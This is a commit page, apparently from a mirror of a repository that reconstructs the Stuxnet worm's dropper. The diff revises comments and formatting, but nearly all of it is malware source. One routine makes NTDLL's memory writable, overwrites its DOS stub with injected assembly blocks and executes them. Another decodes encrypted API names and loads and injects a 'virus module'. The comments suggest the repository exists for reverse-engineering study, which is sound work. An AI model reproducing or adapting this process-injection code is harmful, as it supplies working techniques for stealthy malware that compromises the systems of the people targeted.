github/stuxnet
1
1
Fork 0
mirror of https://github.com/micrictor/stuxnet.git synced 2026-01-07 21:54:01 -05:00
Code Issues Packages Projects Releases Wiki Activity

Update comments on the injection process

Browse Source
This commit is contained in:
Michael R. Torres
2016-10-11 20:11:22 -07:00
parent b0d63ce18b
commit b39a58ef6a
3 changed files with 10 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
Dropper/AssemblyBlock0.c
View File

@@ -21,7 +21,8 @@
** ASSEMBLY BLOCK 0. **
*************************************************************************/
// This is the first bit of code injected into NTDLL at base + 16
// This replaces the builtin MSDOS stub that usually checks for compatability
// ( the infamous "This program cannot be run in DOS mode")
void __declspec(naked) __ASM_BLOCK0_0(void)
{
__asm

4
Dropper/CodeBlock.c
View File

@@ -223,7 +223,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P
hHandleNTDLL = pHardAddrs->NTDLL_DLL;
if(!pHardAddrs->NTDLL_DLL) return 0;
NTDLL_Entry = (void *)(hHandleNTDLL + 16); // Presumably the entry point
NTDLL_Entry = (void *)(hHandleNTDLL + 16);
if(*(_DWORD *)(hHandleNTDLL + 16) == 0xAB49103B) return 0; // Check if the code has been already injected
if(pHardAddrs->VirtualProtect(hHandleNTDLL, 0x1000, PAGE_EXECUTE_WRITECOPY, &dwOld))
@@ -231,7 +231,7 @@ INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, P
// Copy code into ntdll entry point...
BLOCK4_memcpy(NTDLL_Entry, (const void *)sASMCodeBlocksHeader->ASMBlock0Segment.SegmentAddress, sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize);
// ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX because __thiscall
// ...then call __ASM_BLOCK1_0 with a pointer to the entry point as ECX( because __thiscall )
((void (__thiscall *)(void *))sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress)(NTDLL_Entry); // __thiscall ignored by compiler
pHardAddrs->FlushInstructionCache((HANDLE)-1, NULL, 0);

11
Dropper/MemorySections.c
View File

@@ -207,14 +207,16 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
GENERAL_INFO_BLOCK sInfoBlock; // [sp+4h] [bp-80h]@1
// Get a random module name with the format "KERNEL32.DLL.ASLR.XXXXXXXX"
if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0) return 0;
if(GetRandomModuleName(&sInfoBlock, szDebugModuleName) != 0)
return 0;
// Decrypt the Kernel32's and NTDLL's function names
if(bSetup && DecodeEncryptedModuleNames() == FALSE) return -12;
if(bSetup && DecodeEncryptedModuleNames() == FALSE)
return -12;
// Last 4 arguments seem to have been mangled, as -1 is a nonsensical index.
iResult = LoadVirusModuleSection(GetCurrentProcess(), &sInfoBlock, pVirusModule, iVirusModuleSize, -1, NULL, 0, &s_virusBlocksPTR);
if(iResult) return iResult;
if(iResult)
return iResult;
// One-time
if(bSetup)
@@ -225,7 +227,6 @@ INT32 Setup(LPCWSTR szDebugModuleName, PVOID pVirusModule, UINT32 iVirusModuleSi
bSetup = FALSE;
}
// Unknown
iResult = LoadAndInjectVirus((PASM_CODE_BLOCKS_HEADER)s_ASMCodeBlocksPTR, (PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR, &sInfoBlock);
if(!iResult)
*hVirusModule = ((PVIRUS_MODULE_BLOCKS_HEADER)s_virusBlocksPTR)->VirusModulePointer;